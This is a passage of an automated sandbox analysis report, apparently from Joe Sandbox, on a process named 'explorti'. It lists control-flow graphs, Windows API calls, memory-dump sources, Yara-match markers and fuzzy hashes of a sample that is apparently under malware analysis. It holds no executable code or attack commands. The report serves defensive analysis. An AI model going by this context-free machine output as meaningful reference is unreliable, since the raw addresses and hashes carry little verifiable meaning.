5fd6f0-5fd6f1 1708->1710 1714 5fd71a 1709->1714 1715 5fd6f3-5fd6fa call 5f9c61 1709->1715 1710->1709 1712->1706 1719 5fd729-5fd72b 1713->1719 1714->1719 1715->1713 1729 5fd6fc-5fd705 call 5f8cd9 1715->1729 1722 5fd68a-5fd68d 1718->1722 1723 5fd694-5fd69c 1718->1723 1722->1723 1727 5fd68f-5fd692 1722->1727 1723->1687 1724 5fd69e-5fd6a6 call 5fa511 1723->1724 1724->1687 1727->1687 1727->1723 1729->1709 1729->1713
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e22714465d6b77d501fc2fa1715a5601adff53d244d90985271dab06dd9fd9b
                                                                  • Instruction ID: d034cc002420af3e53a38e15df358291f31175a462b686eab022a7bb2341fc7b
                                                                  • Opcode Fuzzy Hash: 6e22714465d6b77d501fc2fa1715a5601adff53d244d90985271dab06dd9fd9b
                                                                  • Instruction Fuzzy Hash: C061D372D0021D8BDF25AF68D8897FDBFB2FB55315F24411AD649AB250D6399C00CB71

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1733 5c8290-5c8311 call 5f4000 1737 5c831d-5c8345 call 5d7840 call 5c5b00 1733->1737 1738 5c8313-5c8318 1733->1738 1746 5c8349-5c836b call 5d7840 call 5c5b00 1737->1746 1747 5c8347 1737->1747 1739 5c845f-5c847b call 5dcef4 1738->1739 1752 5c836d 1746->1752 1753 5c836f-5c8388 1746->1753 1747->1746 1752->1753 1756 5c83b9-5c83e4 1753->1756 1757 5c838a-5c8399 1753->1757 1758 5c83e6-5c83f5 1756->1758 1759 5c8411-5c8432 1756->1759 1760 5c83af-5c83b6 call 5dd569 1757->1760 1761 5c839b-5c83a9 1757->1761 1762 5c8407-5c840e call 5dd569 1758->1762 1763 5c83f7-5c8405 1758->1763 1764 5c8438-5c843d 1759->1764 1765 5c8434-5c8436 GetNativeSystemInfo 1759->1765 1760->1756 1761->1760 1766 5c847c-5c8481 call 5f6b7a 1761->1766 1762->1759 1763->1762 1763->1766 1770 5c843e-5c8445 1764->1770 1765->1770 1770->1739 1775 5c8447-5c844f 1770->1775 1776 5c8458-5c845b 1775->1776 1777 5c8451-5c8456 1775->1777 1776->1739 1778 5c845d 1776->1778 1777->1739 1778->1739
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 005C8434
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID:
                                                                  • API String ID: 1721193555-0
                                                                  • Opcode ID: 5a421c083090031e4e527269788a8c28144754d297ecf892514e4b0fda07f42d
                                                                  • Instruction ID: c39c60a1673631e9893b35ae818d8679b4d7a3729454a291c520935bbbeb4eb9
                                                                  • Opcode Fuzzy Hash: 5a421c083090031e4e527269788a8c28144754d297ecf892514e4b0fda07f42d
                                                                  • Instruction Fuzzy Hash: F85147709002599FDB28EBA8CD89BEDBF75FB45704F50429DE804A7382EF745A84CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1779 5c8a40-5c8a97 GetTempPathA call 5d7840 1781 5c8a9c-5c8ad0 call 5c5b00 1779->1781 1784 5c8ad7-5c8adc 1781->1784 1784->1784 1785 5c8ade-5c8b63 call 5d7f00 * 2 call 5d8060 1784->1785 1792 5c8b94-5c8bb8 1785->1792 1793 5c8b65-5c8b74 1785->1793 1796 5c8bba-5c8bc9 1792->1796 1797 5c8be5-5c8bee 1792->1797 1794 5c8b8a-5c8b91 call 5dd569 1793->1794 1795 5c8b76-5c8b84 1793->1795 1794->1792 1795->1794 1800 5c8c38-5c8c3f call 5f6b7a 1795->1800 1802 5c8bdb-5c8be2 call 5dd569 1796->1802 1803 5c8bcb-5c8bd9 1796->1803 1798 5c8c1b-5c8c37 call 5dcef4 1797->1798 1799 5c8bf0-5c8bff 1797->1799 1804 5c8c11-5c8c18 call 5dd569 1799->1804 1805 5c8c01-5c8c0f 1799->1805 1802->1797 1803->1800 1803->1802 1804->1798 1805->1800 1805->1804
                                                                  APIs
                                                                  • GetTempPathA.KERNELBASE(00000104,?,01A95F48,?,00000000), ref: 005C8A87
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: PathTemp
                                                                  • String ID:
                                                                  • API String ID: 2920410445-0
                                                                  • Opcode ID: ef87c628ff359de0664ab725cfac90ff01b13121e691106840ff4979eb2e22d4
                                                                  • Instruction ID: 84b0f04427f4071232588cf69e0d9d0926c9b8634137dc40a07e383a6d2c90b9
                                                                  • Opcode Fuzzy Hash: ef87c628ff359de0664ab725cfac90ff01b13121e691106840ff4979eb2e22d4
                                                                  • Instruction Fuzzy Hash: 0B51CF719011589FDB28DB28CD89BEDBB75EB86314F0042DEE409A7382DA755F84CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1815 5f6f51-5f6f67 1816 5f6f69-5f6f6d 1815->1816 1817 5f6f77-5f6f87 1815->1817 1816->1817 1818 5f6f6f-5f6f75 1816->1818 1822 5f6f89-5f6f9b SystemTimeToTzSpecificLocalTime 1817->1822 1823 5f6fc7-5f6fca 1817->1823 1819 5f6fcc-5f6fd7 call 5dcef4 1818->1819 1822->1823 1825 5f6f9d-5f6fbd call 5f6fd8 1822->1825 1823->1819 1827 5f6fc2-5f6fc5 1825->1827 1827->1819
                                                                  APIs
                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 005F6F93
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Time$LocalSpecificSystem
                                                                  • String ID:
                                                                  • API String ID: 2574697306-0
                                                                  • Opcode ID: 2c6c41fdc6a5d901ee147c55fe7f37409150ff831ddded08d5f3b33d74f7077a
                                                                  • Instruction ID: ec2062b3439d7059167f2a0873fd365196bfa2adb96bd90500fbb18a4f561497
                                                                  • Opcode Fuzzy Hash: 2c6c41fdc6a5d901ee147c55fe7f37409150ff831ddded08d5f3b33d74f7077a
                                                                  • Instruction Fuzzy Hash: 191133B290010DABCF14DE95D844EEF7BBCAF48310F105266E611E2184E734EB49CB61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1828 5fd6cf-5fd6da 1829 5fd6dc-5fd6e6 1828->1829 1830 5fd6e8-5fd6ee 1828->1830 1829->1830 1833 5fd71c-5fd727 call 5f7423 1829->1833 1831 5fd707-5fd718 RtlAllocateHeap 1830->1831 1832 5fd6f0-5fd6f1 1830->1832 1834 5fd71a 1831->1834 1835 5fd6f3-5fd6fa call 5f9c61 1831->1835 1832->1831 1837 5fd729-5fd72b 1833->1837 1834->1837 1835->1833 1841 5fd6fc-5fd705 call 5f8cd9 1835->1841 1841->1831 1841->1833
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,005FA5CD,?,005F748E,?,00000000,?), ref: 005FD711
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 0a916b81afb67b1d33d36068f0372d63182f04211dbaf1dc0d528d81a2f99619
                                                                  • Instruction ID: 294f89693d0b2ddf79ff212c5606d18838942811bd5340e3f61ad524c66994d8
                                                                  • Opcode Fuzzy Hash: 0a916b81afb67b1d33d36068f0372d63182f04211dbaf1dc0d528d81a2f99619
                                                                  • Instruction Fuzzy Hash: EEF0B43150652D669B213A619C09B7F7F7BFB81760B184511AE099E181CB28D80046F0
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,01A95F48,?,?,005DD302,01A95F48,?,005D78CB,?,?,?,?,?,?,005C7415,?), ref: 005FAF1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 407b936f7ab3f3ae5f2d551750d4818c766cc4cf9800a399e063c76e8682e1f5
                                                                  • Instruction ID: f269145cb742136a363fb01ebadf0fd4b51e294ba2e698a27063fa317f1477a0
                                                                  • Opcode Fuzzy Hash: 407b936f7ab3f3ae5f2d551750d4818c766cc4cf9800a399e063c76e8682e1f5
                                                                  • Instruction Fuzzy Hash: DFE0E5FD10522E56DB3022255C0977B2E8CBB813B0F110020AF0C9F090DA1CCC0085F3
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 952626df147bd905a3191d006f31e4b26299636fbfc67fd36ffc086422f77ef1
                                                                  • Instruction ID: 661886e4a8e324e0ed021749a52bc5a8eac6bd9836bfe7bd25bb7f5a74b48d44
                                                                  • Opcode Fuzzy Hash: 952626df147bd905a3191d006f31e4b26299636fbfc67fd36ffc086422f77ef1
                                                                  • Instruction Fuzzy Hash: EBF0D671E00915ABC710BBACDD1BB0E7F66B746724F81034AE411673D1EB70591087D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4097996891.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_53f0000_explorti.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc4b7c1055477cdc7c81429cd11b7e0a42965a00c36b8410657c14e64326eb19
                                                                  • Instruction ID: 64e1b43b9e0d1565480ae462c7b10104b37c7285b67ed8bd9e4116dae742a38c
                                                                  • Opcode Fuzzy Hash: cc4b7c1055477cdc7c81429cd11b7e0a42965a00c36b8410657c14e64326eb19
                                                                  • Instruction Fuzzy Hash: 011184EF54C2106E6106D5492B58AF7A76EE5D3730330847AF507D7A03E2D94A092230
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4097996891.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_53f0000_explorti.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6ddca3438663f29ded1ac4ac9e97a8eaebe405fb51ab66201529a72a23e1b82
                                                                  • Instruction ID: 7def825ce8e259840d2edcad4d0595017252d67c5d530060a7b0b49480f60bff
                                                                  • Opcode Fuzzy Hash: e6ddca3438663f29ded1ac4ac9e97a8eaebe405fb51ab66201529a72a23e1b82
                                                                  • Instruction Fuzzy Hash: E31152EF14C2107E6006D5896B58AF7AB6EE5E6730331847BF507D7A03E2D94A0D2231
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4097996891.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_53f0000_explorti.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c61e89d6080a42631533130f44f920f4499230cb5ac18004c7dd8cf733743ea8
                                                                  • Instruction ID: 1a722389173adb2d2b2d4e46569a5d90945271618ae63a20a71b2f13ae0c4f42
                                                                  • Opcode Fuzzy Hash: c61e89d6080a42631533130f44f920f4499230cb5ac18004c7dd8cf733743ea8
                                                                  • Instruction Fuzzy Hash: 24F0F9EB14D6207DB046D0462B28AFA976EE4E27303318867F907D2507A2C90A4E5231
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4097996891.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_53f0000_explorti.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93f59d6e6e2339c9f1699d3699d071b31acdc83be124c291371f23098c8bd624
                                                                  • Instruction ID: 34e2d77784c0bce937cde5c8021c8692ca8f466462912018ee3892072dcc442b
                                                                  • Opcode Fuzzy Hash: 93f59d6e6e2339c9f1699d3699d071b31acdc83be124c291371f23098c8bd624
                                                                  • Instruction Fuzzy Hash: 9DF01DEB14D6207D7046D0863B6CAFB976ED4E27303718867F907D2507E2C80A4E1231
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4097996891.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_53f0000_explorti.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3084d20fe8c8ea3972da74db645a4af480316bd7b4f41bf5bb13f7c60054585
                                                                  • Instruction ID: 8eb25e2141889a94e7234d78216611d4a0a983aa5469db908279e12576dc43cb
                                                                  • Opcode Fuzzy Hash: e3084d20fe8c8ea3972da74db645a4af480316bd7b4f41bf5bb13f7c60054585
                                                                  • Instruction Fuzzy Hash: 25F0DAEB1496216DB046D4863B28AFBA76DE4E2730371C87BF903D3547D6890A4E2271
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4097996891.00000000053F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_53f0000_explorti.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 47116717d386b4b3f3a4a1ef96e73cb52118548a3677469b4eda409d966149e4
                                                                  • Instruction ID: 9f56fbb4a2f1ea5d2d5da06f844ed0584d258371ab767c42cb20aeb3ac38e59a
                                                                  • Opcode Fuzzy Hash: 47116717d386b4b3f3a4a1ef96e73cb52118548a3677469b4eda409d966149e4
                                                                  • Instruction Fuzzy Hash: 56F0FEEB14D2607DB142C1463B28AFBA76DE4D2730371C877F543D2547D5890A4E6131
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  • Opcode ID: ace2cd6d78242e7e367dfbecb830ecfa91c6bd0219a3f92a763b1c8f54898825
                                                                  • Instruction ID: b7750c488a5aa330c408727b5f5eb4bf533684b574adad59fe5430a691d1eb0d
                                                                  • Opcode Fuzzy Hash: ace2cd6d78242e7e367dfbecb830ecfa91c6bd0219a3f92a763b1c8f54898825
                                                                  • Instruction Fuzzy Hash: 32C23C71E446298FDB29CF28DD407EAB7BAEB84305F1441EAD54DA7380E775AE818F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
